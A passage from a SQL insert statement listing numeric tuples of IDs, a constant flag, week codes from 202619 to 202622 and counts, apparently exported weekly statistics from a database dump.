,1,'202619',9),(1709,1,'202619',9),(1713,1,'202619',9),(1715,1,'202619',9),(1743,1,'202619',9),(2154,1,'202619',9),(2165,1,'202619',9),(2252,1,'202619',9),(2296,1,'202619',9),(2911,1,'202619',9),(2956,1,'202619',9),(2964,1,'202619',9),(2965,1,'202619',9),(3038,1,'202619',9),(3066,1,'202619',9),(3104,1,'202619',9),(3127,1,'202619',9),(3247,1,'202619',9),(3249,1,'202619',9),(3259,1,'202619',9),(3278,1,'202619',9),(3316,1,'202619',9),(3531,1,'202619',9),(4275,1,'202619',9),(4444,1,'202619',9),(4591,1,'202619',9),(4654,1,'202619',9),(4674,1,'202619',9),(4697,1,'202619',9),(4706,1,'202619',9),(4709,1,'202619',9),(4722,1,'202619',9),(4765,1,'202619',9),(4768,1,'202619',9),(4771,1,'202619',9),(4797,1,'202619',9),(4862,1,'202619',9),(4870,1,'202619',9),(5028,1,'202619',9),(5058,1,'202619',9),(5062,1,'202619',9),(5122,1,'202619',9),(5146,1,'202619',9),(5264,1,'202619',9),(5292,1,'202619',9),(5301,1,'202619',9),(5314,1,'202619',9),(5400,1,'202619',9),(5515,1,'202619',9),(5585,1,'202619',9),(5833,1,'202619',9),(467,1,'202619',10),(479,1,'202619',10),(485,1,'202619',10),(1592,1,'202619',10),(1598,1,'202619',10),(1606,1,'202619',10),(1610,1,'202619',10),(1703,1,'202619',10),(1718,1,'202619',10),(1730,1,'202619',10),(1739,1,'202619',10),(2248,1,'202619',10),(2809,1,'202619',10),(3023,1,'202619',10),(3027,1,'202619',10),(3069,1,'202619',10),(3096,1,'202619',10),(3109,1,'202619',10),(3124,1,'202619',10),(3245,1,'202619',10),(3313,1,'202619',10),(3479,1,'202619',10),(3735,1,'202619',10),(4377,1,'202619',10),(4400,1,'202619',10),(4404,1,'202619',10),(4408,1,'202619',10),(4454,1,'202619',10),(4648,1,'202619',10),(4703,1,'202619',10),(4792,1,'202619',10),(4980,1,'202619',10),(5101,1,'202619',10),(5256,1,'202619',10),(5304,1,'202619',10),(5334,1,'202619',10),(5492,1,'202619',10),(5512,1,'202619',10),(5582,1,'202619',10),(5609,1,'202619',10),(469,1,'202619',11),(1705,1,'202619',11),(1707,1,'202619',11),(1732,1,'202619',11),(1768,1,'202619',11),(1772,1,'202619',11),(1776,1,'202619',11),(2156,1,'202619',11),(2297,1,'202619',11),(2309,1,'202619',11),(3004,1,'202619',11),(3006,1,'202619',11),(3034,1,'202619',11),(3063,1,'202619',11),(3090,1,'202619',11),(3240,1,'202619',11),(3267,1,'202619',11),(3285,1,'202619',11),(3482,1,'202619',11),(3486,1,'202619',11),(3534,1,'202619',11),(3727,1,'202619',11),(3746,1,'202619',11),(4357,1,'202619',11),(4363,1,'202619',11),(4396,1,'202619',11),(4412,1,'202619',11),(4416,1,'202619',11),(4420,1,'202619',11),(4514,1,'202619',11),(4551,1,'202619',11),(4566,1,'202619',11),(4668,1,'202619',11),(4677,1,'202619',11),(4688,1,'202619',11),(4744,1,'202619',11),(5050,1,'202619',11),(5134,1,'202619',11),(5140,1,'202619',11),(5320,1,'202619',11),(5326,1,'202619',11),(5374,1,'202619',11),(5383,1,'202619',11),(5561,1,'202619',11),(5567,1,'202619',11),(5683,1,'202619',11),(483,1,'202619',12),(1584,1,'202619',12),(1701,1,'202619',12),(1726,1,'202619',12),(2609,1,'202619',12),(2993,1,'202619',12),(3079,1,'202619',12),(3097,1,'202619',12),(3107,1,'202619',12),(3117,1,'202619',12),(3243,1,'202619',12),(3731,1,'202619',12),(3738,1,'202619',12),(3752,1,'202619',12),(4424,1,'202619',12),(4457,1,'202619',12),(4517,1,'202619',12),(4524,1,'202619',12),(4582,1,'202619',12),(4651,1,'202619',12),(4685,1,'202619',12),(4694,1,'202619',12),(4747,1,'202619',12),(4753,1,'202619',12),(4977,1,'202619',12),(5131,1,'202619',12),(5157,1,'202619',12),(5271,1,'202619',12),(5323,1,'202619',12),(5378,1,'202619',12),(5415,1,'202619',12),(5464,1,'202619',12),(5570,1,'202619',12),(5601,1,'202619',12),(5605,1,'202619',12),(5626,1,'202619',12),(5674,1,'202619',12),(471,1,'202619',13),(1596,1,'202619',13),(1722,1,'202619',13),(2558,1,'202619',13),(2617,1,'202619',13),(2748,1,'202619',13),(3102,1,'202619',13),(3251,1,'202619',13),(3269,1,'202619',13),(3271,1,'202619',13),(3307,1,'202619',13),(3724,1,'202619',13),(4326,1,'202619',13),(4341,1,'202619',13),(4556,1,'202619',13),(4587,1,'202619',13),(4741,1,'202619',13),(4762,1,'202619',13),(4874,1,'202619',13),(4897,1,'202619',13),(5033,1,'202619',13),(5080,1,'202619',13),(5128,1,'202619',13),(5307,1,'202619',13),(472,1,'202619',14),(487,1,'202619',14),(1588,1,'202619',14),(1612,1,'202619',14),(2148,1,'202619',14),(3030,1,'202619',14),(3297,1,'202619',14),(3438,1,'202619',14),(3721,1,'202619',14),(3777,1,'202619',14),(4335,1,'202619',14),(4700,1,'202619',14),(4750,1,'202619',14),(5353,1,'202619',14),(5363,1,'202619',14),(5409,1,'202619',14),(5457,1,'202619',14),(5489,1,'202619',14),(5578,1,'202619',14),(473,1,'202619',15),(476,1,'202619',15),(1600,1,'202619',15),(1608,1,'202619',15),(1778,1,'202619',15),(2457,1,'202619',15),(2658,1,'202619',15),(2769,1,'202619',15),(3253,1,'202619',15),(3290,1,'202619',15),(3489,1,'202619',15),(3742,1,'202619',15),(3764,1,'202619',15),(3774,1,'202619',15),(4301,1,'202619',15),(4368,1,'202619',15),(4759,1,'202619',15),(5137,1,'202619',15),(5436,1,'202619',15),(5738,1,'202619',15),(5771,1,'202619',15),(5785,1,'202619',15),(5821,1,'202619',15),(5844,1,'202619',15),(1594,1,'202619',16),(1766,1,'202619',16),(3265,1,'202619',16),(3749,1,'202619',16),(4645,1,'202619',16),(4776,1,'202619',16),(4866,1,'202619',16),(5310,1,'202619',16),(5441,1,'202619',16),(5816,1,'202619',16),(1728,1,'202619',17),(2775,1,'202619',17),(3041,1,'202619',17),(3045,1,'202619',17),(4448,1,'202619',17),(4520,1,'202619',17),(4542,1,'202619',17),(4612,1,'202619',17),(5420,1,'202619',17),(5433,1,'202619',17),(5449,1,'202619',17),(5467,1,'202619',17),(5828,1,'202619',17),(1544,1,'202619',18),(1741,1,'202619',18),(2159,1,'202619',18),(2989,1,'202619',18),(3083,1,'202619',18),(5276,1,'202619',18),(5696,1,'202619',18),(5700,1,'202619',18),(5762,1,'202619',18),(570,1,'202619',19),(1604,1,'202619',19),(1780,1,'202619',19),(2804,1,'202619',19),(5735,1,'202619',19),(1602,1,'202619',20),(1770,1,'202619',20),(2704,1,'202619',20),(5824,1,'202619',20),(74,1,'202619',21),(108,1,'202619',21),(335,1,'202619',21),(1586,1,'202619',21),(1614,1,'202619',21),(3541,1,'202619',21),(4238,1,'202619',21),(5071,1,'202619',21),(5259,1,'202619',21),(5454,1,'202619',21),(468,1,'202619',22),(470,1,'202619',22),(1724,1,'202619',23),(2503,1,'202619',23),(3430,1,'202619',23),(5406,1,'202619',23),(5847,1,'202619',23),(5875,1,'202619',23),(2813,1,'202619',24),(4930,1,'202619',24),(5769,1,'202619',25),(5778,1,'202619',25),(5865,1,'202619',25),(5868,1,'202619',25),(474,1,'202619',26),(5502,1,'202619',26),(5076,1,'202619',27),(5878,1,'202619',29),(87,1,'202619',31),(5397,1,'202619',32),(5593,1,'202619',32),(1582,1,'202619',33),(5872,1,'202619',38),(3781,1,'202619',39),(5859,1,'202619',40),(76,1,'202619',44),(91,1,'202619',44),(3087,1,'202619',48),(1747,1,'202619',49),(5881,1,'202619',49),(5268,1,'202619',51),(89,1,'202619',57),(68,1,'202619',59),(2904,1,'202619',65),(5884,1,'202619',71),(84,1,'202619',77),(72,1,'202619',132),(80,1,'202619',144),(3060,1,'202619',163),(9,1,'202619',4657),(3104,1,'202620',1),(1745,1,'202620',2),(2293,1,'202620',2),(3109,1,'202620',2),(3247,1,'202620',2),(4382,1,'202620',2),(1713,1,'202620',3),(1749,1,'202620',3),(1774,1,'202620',3),(2248,1,'202620',3),(2609,1,'202620',3),(3249,1,'202620',3),(3263,1,'202620',3),(3275,1,'202620',3),(3430,1,'202620',3),(4357,1,'202620',3),(4432,1,'202620',3),(4591,1,'202620',3),(4883,1,'202620',3),(4888,1,'202620',3),(1730,1,'202620',4),(1766,1,'202620',4),(1772,1,'202620',4),(1776,1,'202620',4),(2156,1,'202620',4),(2165,1,'202620',4),(2964,1,'202620',4),(3096,1,'202620',4),(3229,1,'202620',4),(3245,1,'202620',4),(3257,1,'202620',4),(3271,1,'202620',4),(3280,1,'202620',4),(3489,1,'202620',4),(4416,1,'202620',4),(4428,1,'202620',4),(4546,1,'202620',4),(4862,1,'202620',4),(4988,1,'202620',4),(5280,1,'202620',4),(478,1,'202620',5),(482,1,'202620',5),(484,1,'202620',5),(1709,1,'202620',5),(1739,1,'202620',5),(1747,1,'202620',5),(2154,1,'202620',5),(2993,1,'202620',5),(3066,1,'202620',5),(3097,1,'202620',5),(3107,1,'202620',5),(3240,1,'202620',5),(3265,1,'202620',5),(3285,1,'202620',5),(3313,1,'202620',5),(3316,1,'202620',5),(3534,1,'202620',5),(3746,1,'202620',5),(4363,1,'202620',5),(4514,1,'202620',5),(4648,1,'202620',5),(4654,1,'202620',5),(4688,1,'202620',5),(4765,1,'202620',5),(4768,1,'202620',5),(4858,1,'202620',5),(4870,1,'202620',5),(4980,1,'202620',5),(5028,1,'202620',5),(5042,1,'202620',5),(5146,1,'202620',5),(5323,1,'202620',5),(110,1,'202620',6),(1697,1,'202620',6),(1699,1,'202620',6),(1715,1,'202620',6),(1734,1,'202620',6),(1737,1,'202620',6),(1770,1,'202620',6),(2617,1,'202620',6),(3038,1,'202620',6),(3087,1,'202620',6),(3090,1,'202620',6),(3127,1,'202620',6),(3261,1,'202620',6),(3267,1,'202620',6),(3290,1,'202620',6),(3742,1,'202620',6),(4373,1,'202620',6),(4404,1,'202620',6),(4408,1,'202620',6),(4566,1,'202620',6),(4663,1,'202620',6),(4674,1,'202620',6),(4691,1,'202620',6),(4694,1,'202620',6),(4706,1,'202620',6),(4792,1,'202620',6),(4893,1,'202620',6),(5024,1,'202620',6),(5058,1,'202620',6),(5067,1,'202620',6),(5122,1,'202620',6),(5125,1,'202620',6),(5134,1,'202620',6),(5137,1,'202620',6),(5153,1,'202620',6),(5276,1,'202620',6),(5320,1,'202620',6),(5515,1,'202620',6),(483,1,'202620',7),(1732,1,'202620',7),(1768,1,'202620',7),(2063,1,'202620',7),(2178,1,'202620',7),(2296,1,'202620',7),(3041,1,'202620',7),(3079,1,'202620',7),(3124,1,'202620',7),(3269,1,'202620',7),(3278,1,'202620',7),(3287,1,'202620',7),(3541,1,'202620',7),(4332,1,'202620',7),(4454,1,'202620',7),(4551,1,'202620',7),(4657,1,'202620',7),(4681,1,'202620',7),(4697,1,'202620',7),(4756,1,'202620',7),(4762,1,'202620',7),(4771,1,'202620',7),(4802,1,'202620',7),(4866,1,'202620',7),(4983,1,'202620',7),(4996,1,'202620',7),(5046,1,'202620',7),(5062,1,'202620',7),(5256,1,'202620',7),(5292,1,'202620',7),(5295,1,'202620',7),(5383,1,'202620',7),(5441,1,'202620',7),(5467,1,'202620',7),(5561,1,'202620',7),(5582,1,'202620',7),(469,1,'202620',8),(486,1,'202620',8),(1598,1,'202620',8),(1701,1,'202620',8),(1703,1,'202620',8),(1705,1,'202620',8),(1720,1,'202620',8),(1726,1,'202620',8),(2751,1,'202620',8),(2769,1,'202620',8),(3034,1,'202620',8),(3063,1,'202620',8),(3069,1,'202620',8),(3273,1,'202620',8),(3721,1,'202620',8),(3731,1,'202620',8),(4329,1,'202620',8),(4341,1,'202620',8),(4387,1,'202620',8),(4391,1,'202620',8),(4457,1,'202620',8),(4542,1,'202620',8),(4582,1,'202620',8),(4703,1,'202620',8),(4744,1,'202620',8),(4753,1,'202620',8),(4976,1,'202620',8),(5020,1,'202620',8),(5037,1,'202620',8),(5050,1,'202620',8),(5128,1,'202620',8),(5264,1,'202620',8),(5289,1,'202620',8),(5301,1,'202620',8),(5359,1,'202620',8),(5374,1,'202620',8),(5415,1,'202620',8),(5425,1,'202620',8),(5449,1,'202620',8),(5457,1,'202620',8),(5598,1,'202620',8),(5609,1,'202620',8),(476,1,'202620',9),(479,1,'202620',9),(481,1,'202620',9),(488,1,'202620',9),(1590,1,'202620',9),(1610,1,'202620',9),(1695,1,'202620',9),(1722,1,'202620',9),(2150,1,'202620',9),(2152,1,'202620',9),(2159,1,'202620',9),(2252,1,'202620',9),(2809,1,'202620',9),(2813,1,'202620',9),(2956,1,'202620',9),(2989,1,'202620',9),(3006,1,'202620',9),(3027,1,'202620',9),(3117,1,'202620',9),(3243,1,'202620',9),(3498,1,'202620',9),(3714,1,'202620',9),(3738,1,'202620',9),(4396,1,'202620',9),(4400,1,'202620',9),(4412,1,'202620',9),(4440,1,'202620',9),(4700,1,'202620',9),(4797,1,'202620',9),(4874,1,'202620',9),(5054,1,'202620',9),(5140,1,'202620',9),(5248,1,'202620',9),(5253,1,'202620',9),(5334,1,'202620',9),(5454,1,'202620',9),(5585,1,'202620',9),(480,1,'202620',10),(485,1,'202620',10),(1711,1,'202620',10),(1743,1,'202620',10),(1751,1,'202620',10),(2297,1,'202620',10),(2748,1,'202620',10),(2965,1,'202620',10),(2991,1,'202620',10),(3030,1,'202620',10),(3092,1,'202620',10),(3259,1,'202620',10),(3307,1,'202620',10),(3438,1,'202620',10),(3482,1,'202620',10),(3724,1,'202620',10),(3727,1,'202620',10),(3735,1,'202620',10),(4338,1,'202620',10),(4377,1,'202620',10),(4444,1,'202620',10),(4448,1,'202620',10),(4517,1,'202620',10),(4524,1,'202620',10),(4612,1,'202620',10),(4668,1,'202620',10),(4709,1,'202620',10),(4712,1,'202620',10),(5101,1,'202620',10),(5157,1,'202620',10),(5271,1,'202620',10),(5298,1,'202620',10),(5304,1,'202620',10),(5492,1,'202620',10),(5601,1,'202620',10),(5636,1,'202620',10),(5666,1,'202620',10),(471,1,'202620',11),(1612,1,'202620',11),(1782,1,'202620',11),(2148,1,'202620',11),(2457,1,'202620',11),(2658,1,'202620',11),(2775,1,'202620',11),(3072,1,'202620',11),(3102,1,'202620',11),(3226,1,'202620',11),(3282,1,'202620',11),(3479,1,'202620',11),(3531,1,'202620',11),(3771,1,'202620',11),(3777,1,'202620',11),(4326,1,'202620',11),(4556,1,'202620',11),(4677,1,'202620',11),(4741,1,'202620',11),(4897,1,'202620',11),(5378,1,'202620',11),(5771,1,'202620',11),(5785,1,'202620',11),(467,1,'202620',12),(570,1,'202620',12),(1741,1,'202620',12),(2161,1,'202620',12),(2309,1,'202620',12),(3004,1,'202620',12),(3005,1,'202620',12),(3023,1,'202620',12),(3253,1,'202620',12),(3297,1,'202620',12),(3486,1,'202620',12),(3749,1,'202620',12),(3774,1,'202620',12),(4301,1,'202620',12),(4436,1,'202620',12),(4587,1,'202620',12),(4608,1,'202620',12),(4645,1,'202620',12),(4685,1,'202620',12),(4722,1,'202620',12),(4776,1,'202620',12),(4878,1,'202620',12),(5314,1,'202620',12),(5317,1,'202620',12),(5326,1,'202620',12),(5330,1,'202620',12),(5353,1,'202620',12),(5409,1,'202620',12),(5578,1,'202620',12),(5662,1,'202620',12),(1594,1,'202620',13),(1600,1,'202620',13),(1718,1,'202620',13),(2801,1,'202620',13),(3045,1,'202620',13),(3710,1,'202620',13),(4368,1,'202620',13),(4424,1,'202620',13),(4750,1,'202620',13),(4977,1,'202620',13),(5080,1,'202620',13),(5131,1,'202620',13),(5163,1,'202620',13),(5310,1,'202620',13),(5512,1,'202620',13),(5567,1,'202620',13),(477,1,'202620',14),(1596,1,'202620',14),(1728,1,'202620',14),(4238,1,'202620',14),(4275,1,'202620',14),(4323,1,'202620',14),(4529,1,'202620',14),(5033,1,'202620',14),(5307,1,'202620',14),(1544,1,'202620',15),(1592,1,'202620',15),(1606,1,'202620',15),(1614,1,'202620',15),(1780,1,'202620',15),(2558,1,'202620',15),(2804,1,'202620',15),(4747,1,'202620',15),(4759,1,'202620',15),(5356,1,'202620',15),(5400,1,'202620',15),(5428,1,'202620',15),(5433,1,'202620',15),(5461,1,'202620',15),(5605,1,'202620',15),(5683,1,'202620',15),(5700,1,'202620',15),(5865,1,'202620',15),(1588,1,'202620',16),(2704,1,'202620',16),(3083,1,'202620',16),(4520,1,'202620',16),(5363,1,'202620',16),(5436,1,'202620',16),(5464,1,'202620',16),(5472,1,'202620',16),(5778,1,'202620',16),(5821,1,'202620',16),(5833,1,'202620',16),(472,1,'202620',17),(1707,1,'202620',17),(2911,1,'202620',17),(3764,1,'202620',17),(4335,1,'202620',17),(4651,1,'202620',17),(4660,1,'202620',17),(5268,1,'202620',17),(5570,1,'202620',17),(5816,1,'202620',17),(5889,1,'202620',17),(102,1,'202620',18),(1604,1,'202620',18),(3752,1,'202620',18),(5259,1,'202620',18),(5412,1,'202620',18),(5674,1,'202620',18),(5696,1,'202620',18),(5868,1,'202620',18),(1778,1,'202620',19),(5872,1,'202620',19),(4420,1,'202620',20),(5844,1,'202620',20),(1724,1,'202620',21),(5735,1,'202620',21),(5824,1,'202620',21),(473,1,'202620',22),(1584,1,'202620',22),(5397,1,'202620',22),(5738,1,'202620',22),(5406,1,'202620',23),(5420,1,'202620',23),(5593,1,'202620',23),(1608,1,'202620',24),(5762,1,'202620',24),(5769,1,'202620',25),(74,1,'202620',27),(106,1,'202620',27),(5071,1,'202620',27),(468,1,'202620',28),(1602,1,'202620',28),(487,1,'202620',29),(5076,1,'202620',29),(5847,1,'202620',29),(5502,1,'202620',30),(5489,1,'202620',33),(1586,1,'202620',34),(5875,1,'202620',35),(5878,1,'202620',35),(470,1,'202620',36),(5881,1,'202620',36),(5828,1,'202620',37),(4930,1,'202620',38),(108,1,'202620',39),(2503,1,'202620',39),(2904,1,'202620',39),(474,1,'202620',41),(5859,1,'202620',42),(87,1,'202620',43),(3781,1,'202620',43),(335,1,'202620',44),(5626,1,'202620',44),(76,1,'202620',45),(1582,1,'202620',45),(91,1,'202620',56),(3060,1,'202620',59),(3251,1,'202620',64),(68,1,'202620',65),(89,1,'202620',70),(5884,1,'202620',74),(84,1,'202620',90),(72,1,'202620',167),(80,1,'202620',189),(9,1,'202620',4918),(106,1,'202621',3),(3109,1,'202621',3),(3531,1,'202621',3),(1707,1,'202621',4),(3247,1,'202621',4),(3257,1,'202621',4),(3261,1,'202621',4),(3269,1,'202621',4),(3280,1,'202621',4),(3287,1,'202621',4),(3486,1,'202621',4),(3746,1,'202621',4),(4275,1,'202621',4),(4648,1,'202621',4),(4663,1,'202621',4),(4712,1,'202621',4),(4792,1,'202621',4),(4893,1,'202621',4),(5042,1,'202621',4),(5461,1,'202621',4),(1695,1,'202621',5),(1697,1,'202621',5),(1699,1,'202621',5),(1701,1,'202621',5),(1709,1,'202621',5),(1711,1,'202621',5),(1720,1,'202621',5),(1726,1,'202621',5),(1730,1,'202621',5),(1739,1,'202621',5),(1741,1,'202621',5),(1745,1,'202621',5),(2063,1,'202621',5),(2156,1,'202621',5),(2178,1,'202621',5),(2252,1,'202621',5),(2296,1,'202621',5),(3092,1,'202621',5),(3117,1,'202621',5),(3263,1,'202621',5),(3282,1,'202621',5),(3313,1,'202621',5),(3534,1,'202621',5),(3735,1,'202621',5),(3742,1,'202621',5),(4323,1,'202621',5),(4412,1,'202621',5),(4424,1,'202621',5),(4591,1,'202621',5),(4668,1,'202621',5),(4685,1,'202621',5),(4694,1,'202621',5),(4706,1,'202621',5),(4750,1,'202621',5),(4883,1,'202621',5),(4888,1,'202621',5),(5020,1,'202621',5),(5046,1,'202621',5),(5295,1,'202621',5),(5467,1,'202621',5),(110,1,'202621',6),(478,1,'202621',6),(1737,1,'202621',6),(1768,1,'202621',6),(1772,1,'202621',6),(2152,1,'202621',6),(2609,1,'202621',6),(3034,1,'202621',6),(3072,1,'202621',6),(3079,1,'202621',6),(3226,1,'202621',6),(3243,1,'202621',6),(3267,1,'202621',6),(3271,1,'202621',6),(3285,1,'202621',6),(3430,1,'202621',6),(3541,1,'202621',6),(4338,1,'202621',6),(4357,1,'202621',6),(4382,1,'202621',6),(4517,1,'202621',6),(4657,1,'202621',6),(4688,1,'202621',6),(4703,1,'202621',6),(4741,1,'202621',6),(4744,1,'202621',6),(4747,1,'202621',6),(4858,1,'202621',6),(4870,1,'202621',6),(480,1,'202621',7),(482,1,'202621',7),(1713,1,'202621',7),(1734,1,'202621',7),(1776,1,'202621',7),(1782,1,'202621',7),(2150,1,'202621',7),(2293,1,'202621',7),(2751,1,'202621',7),(3027,1,'202621',7),(3045,1,'202621',7),(3087,1,'202621',7),(3090,1,'202621',7),(3097,1,'202621',7),(3249,1,'202621',7),(3259,1,'202621',7),(3714,1,'202621',7),(3724,1,'202621',7),(3738,1,'202621',7),(3752,1,'202621',7),(4341,1,'202621',7),(4391,1,'202621',7),(4408,1,'202621',7),(4416,1,'202621',7),(4428,1,'202621',7),(4432,1,'202621',7),(4546,1,'202621',7),(4551,1,'202621',7),(4674,1,'202621',7),(4802,1,'202621',7),(4862,1,'202621',7),(4866,1,'202621',7),(4874,1,'202621',7),(4897,1,'202621',7),(4976,1,'202621',7),(4988,1,'202621',7),(5037,1,'202621',7),(5140,1,'202621',7),(5253,1,'202621',7),(5412,1,'202621',7),(5415,1,'202621',7),(5425,1,'202621',7),(5666,1,'202621',7),(102,1,'202621',8),(481,1,'202621',8),(486,1,'202621',8),(1703,1,'202621',8),(1732,1,'202621',8),(1749,1,'202621',8),(1751,1,'202621',8),(1774,1,'202621',8),(2148,1,'202621',8),(2161,1,'202621',8),(2165,1,'202621',8),(2769,1,'202621',8),(2989,1,'202621',8),(2991,1,'202621',8),(2993,1,'202621',8),(3066,1,'202621',8),(3096,1,'202621',8),(3265,1,'202621',8),(3273,1,'202621',8),(3275,1,'202621',8),(3278,1,'202621',8),(3438,1,'202621',8),(3498,1,'202621',8),(3721,1,'202621',8),(3727,1,'202621',8),(4332,1,'202621',8),(4363,1,'202621',8),(4377,1,'202621',8),(4404,1,'202621',8),(4444,1,'202621',8),(4566,1,'202621',8),(4587,1,'202621',8),(4681,1,'202621',8),(4691,1,'202621',8),(4697,1,'202621',8),(4709,1,'202621',8),(5028,1,'202621',8),(5101,1,'202621',8),(5125,1,'202621',8),(5128,1,'202621',8),(5248,1,'202621',8),(5271,1,'202621',8),(5289,1,'202621',8),(5330,1,'202621',8),(5464,1,'202621',8),(5492,1,'202621',8),(5570,1,'202621',8),(467,1,'202621',9),(479,1,'202621',9),(483,1,'202621',9),(484,1,'202621',9),(1586,1,'202621',9),(1715,1,'202621',9),(1728,1,'202621',9),(2248,1,'202621',9),(2658,1,'202621',9),(2801,1,'202621',9),(3069,1,'202621',9),(3107,1,'202621',9),(3124,1,'202621',9),(3229,1,'202621',9),(3245,1,'202621',9),(3253,1,'202621',9),(3316,1,'202621',9),(3710,1,'202621',9),(3774,1,'202621',9),(3777,1,'202621',9),(4373,1,'202621',9),(4400,1,'202621',9),(4440,1,'202621',9),(4457,1,'202621',9),(4582,1,'202621',9),(4645,1,'202621',9),(4660,1,'202621',9),(4677,1,'202621',9),(4753,1,'202621',9),(4756,1,'202621',9),(4797,1,'202621',9),(4878,1,'202621',9),(5058,1,'202621',9),(5383,1,'202621',9),(5454,1,'202621',9),(5472,1,'202621',9),(5582,1,'202621',9),(5601,1,'202621',9),(5609,1,'202621',9),(5889,1,'202621',9),(477,1,'202621',10),(1766,1,'202621',10),(1770,1,'202621',10),(2154,1,'202621',10),(2309,1,'202621',10),(2748,1,'202621',10),(2775,1,'202621',10),(2911,1,'202621',10),(3038,1,'202621',10),(3063,1,'202621',10),(3104,1,'202621',10),(3297,1,'202621',10),(3479,1,'202621',10),(3482,1,'202621',10),(3771,1,'202621',10),(4368,1,'202621',10),(4396,1,'202621',10),(4454,1,'202621',10),(4514,1,'202621',10),(4651,1,'202621',10),(4700,1,'202621',10),(4768,1,'202621',10),(4980,1,'202621',10),(4983,1,'202621',10),(5050,1,'202621',10),(5054,1,'202621',10),(5122,1,'202621',10),(5134,1,'202621',10),(5153,1,'202621',10),(5268,1,'202621',10),(5314,1,'202621',10),(5374,1,'202621',10),(5378,1,'202621',10),(5512,1,'202621',10),(471,1,'202621',11),(488,1,'202621',11),(570,1,'202621',11),(1588,1,'202621',11),(1600,1,'202621',11),(1705,1,'202621',11),(2457,1,'202621',11),(2809,1,'202621',11),(2964,1,'202621',11),(2965,1,'202621',11),(3023,1,'202621',11),(3030,1,'202621',11),(3041,1,'202621',11),(3127,1,'202621',11),(3749,1,'202621',11),(4326,1,'202621',11),(4387,1,'202621',11),(4436,1,'202621',11),(4448,1,'202621',11),(4542,1,'202621',11),(4722,1,'202621',11),(4996,1,'202621',11),(5024,1,'202621',11),(5062,1,'202621',11),(5131,1,'202621',11),(5317,1,'202621',11),(5320,1,'202621',11),(5363,1,'202621',11),(5561,1,'202621',11),(5578,1,'202621',11),(5585,1,'202621',11),(5636,1,'202621',11),(5674,1,'202621',11),(5762,1,'202621',11),(485,1,'202621',12),(1596,1,'202621',12),(1606,1,'202621',12),(1780,1,'202621',12),(2297,1,'202621',12),(2617,1,'202621',12),(3290,1,'202621',12),(4329,1,'202621',12),(4529,1,'202621',12),(5033,1,'202621',12),(5080,1,'202621',12),(5163,1,'202621',12),(5256,1,'202621',12),(5259,1,'202621',12),(5298,1,'202621',12),(5515,1,'202621',12),(5567,1,'202621',12),(5844,1,'202621',12),(469,1,'202621',13),(472,1,'202621',13),(487,1,'202621',13),(1584,1,'202621',13),(1590,1,'202621',13),(1594,1,'202621',13),(1598,1,'202621',13),(2159,1,'202621',13),(2804,1,'202621',13),(2813,1,'202621',13),(3006,1,'202621',13),(3307,1,'202621',13),(4335,1,'202621',13),(4556,1,'202621',13),(4654,1,'202621',13),(4759,1,'202621',13),(4771,1,'202621',13),(5292,1,'202621',13),(5304,1,'202621',13),(5310,1,'202621',13),(1544,1,'202621',14),(1778,1,'202621',14),(4301,1,'202621',14),(4612,1,'202621',14),(5067,1,'202621',14),(5137,1,'202621',14),(5146,1,'202621',14),(5280,1,'202621',14),(5323,1,'202621',14),(5457,1,'202621',14),(5626,1,'202621',14),(5778,1,'202621',14),(5785,1,'202621',14),(5833,1,'202621',14),(5865,1,'202621',14),(5868,1,'202621',14),(1592,1,'202621',15),(1604,1,'202621',15),(1722,1,'202621',15),(2704,1,'202621',15),(3005,1,'202621',15),(3489,1,'202621',15),(3731,1,'202621',15),(4762,1,'202621',15),(4776,1,'202621',15),(5409,1,'202621',15),(5683,1,'202621',15),(5816,1,'202621',15),(5828,1,'202621',15),(476,1,'202621',16),(1612,1,'202621',16),(3004,1,'202621',16),(3240,1,'202621',16),(4238,1,'202621',16),(4520,1,'202621',16),(4524,1,'202621',16),(4608,1,'202621',16),(5264,1,'202621',16),(5334,1,'202621',16),(5356,1,'202621',16),(5436,1,'202621',16),(5449,1,'202621',16),(5598,1,'202621',16),(1610,1,'202621',17),(1743,1,'202621',17),(2956,1,'202621',17),(5276,1,'202621',17),(5326,1,'202621',17),(5420,1,'202621',17),(5428,1,'202621',17),(5605,1,'202621',17),(468,1,'202621',18),(470,1,'202621',18),(3102,1,'202621',18),(4420,1,'202621',18),(4765,1,'202621',18),(4977,1,'202621',18),(5071,1,'202621',18),(5489,1,'202621',18),(5696,1,'202621',18),(5307,1,'202621',19),(5738,1,'202621',19),(5878,1,'202621',19),(3083,1,'202621',20),(5735,1,'202621',20),(5824,1,'202621',20),(87,1,'202621',21),(3764,1,'202621',21),(5157,1,'202621',21),(5353,1,'202621',21),(5400,1,'202621',21),(5771,1,'202621',21),(5847,1,'202621',21),(5872,1,'202621',21),(5881,1,'202621',21),(74,1,'202621',22),(1614,1,'202621',23),(5441,1,'202621',23),(5700,1,'202621',23),(4930,1,'202621',24),(5433,1,'202621',24),(5502,1,'202621',24),(5875,1,'202621',24),(2558,1,'202621',25),(5076,1,'202621',25),(5406,1,'202621',25),(108,1,'202621',26),(1602,1,'202621',26),(5359,1,'202621',26),(3781,1,'202621',27),(5593,1,'202621',27),(335,1,'202621',28),(1608,1,'202621',28),(1747,1,'202621',28),(2503,1,'202621',28),(5821,1,'202621',29),(1582,1,'202621',30),(84,1,'202621',31),(5769,1,'202621',31),(474,1,'202621',32),(473,1,'202621',33),(5301,1,'202621',33),(3251,1,'202621',34),(5662,1,'202621',35),(2904,1,'202621',38),(5859,1,'202621',38),(3060,1,'202621',39),(5397,1,'202621',40),(1724,1,'202621',43),(76,1,'202621',44),(89,1,'202621',51),(68,1,'202621',53),(91,1,'202621',75),(5884,1,'202621',76),(72,1,'202621',121),(1718,1,'202621',140),(80,1,'202621',197),(9,1,'202621',5054),(4996,1,'202622',2),(5330,1,'202622',2),(3771,1,'202622',3),(5582,1,'202622',3),(479,1,'202622',4),(485,1,'202622',4),(2165,1,'202622',4),(3245,1,'202622',4),(4323,1,'202622',4),(4326,1,'202622',4),(4457,1,'202622',4),(4674,1,'202622',4),(4681,1,'202622',4),(4688,1,'202622',4),(4706,1,'202622',4),(4765,1,'202622',4),(5268,1,'202622',4),(5472,1,'202622',4),(5609,1,'202622',4),(482,1,'202622',5),(1701,1,'202622',5),(1709,1,'202622',5),(1732,1,'202622',5),(2178,1,'202622',5),(3069,1,'202622',5),(3072,1,'202622',5),(3104,1,'202622',5),(3482,1,'202622',5),(4654,1,'202622',5),(4741,1,'202622',5),(4744,1,'202622',5),(4977,1,'202622',5),(5140,1,'202622',5),(5153,1,'202622',5),(5289,1,'202622',5),(5374,1,'202622',5),(5683,1,'202622',5),(467,1,'202622',6),(481,1,'202622',6),(488,1,'202622',6),(1594,1,'202622',